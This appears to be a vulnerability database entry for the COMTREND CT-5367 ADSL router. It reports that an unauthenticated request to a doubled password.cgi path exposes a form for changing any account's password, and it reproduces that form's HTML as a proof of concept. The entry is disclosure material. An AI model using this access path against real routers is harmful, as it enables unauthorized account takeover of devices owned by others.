COMTREND ADSL Router CT-5367 -...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Description Any user can edit all users password and execute remote code directly without have access ### Proof of Concept request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi ``` <form> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120">Username:</td> <td><select name='userName' size="1"> <option value="0"> <option value="1">root <!-- admin --> <option value="2">support <!-- support --> <option value="3">user <!-- user --> </select></td> </tr> <tr> <td>Old Password:</td> <td><input name='pwdOld' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>New Password:</td> <td><input name='pwdNew' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>Confirm Password:</td> <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td> </tr> </table> <br> <center><input type='button' onClick='btnApply()' value='Save/Apply'></center> </form> ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息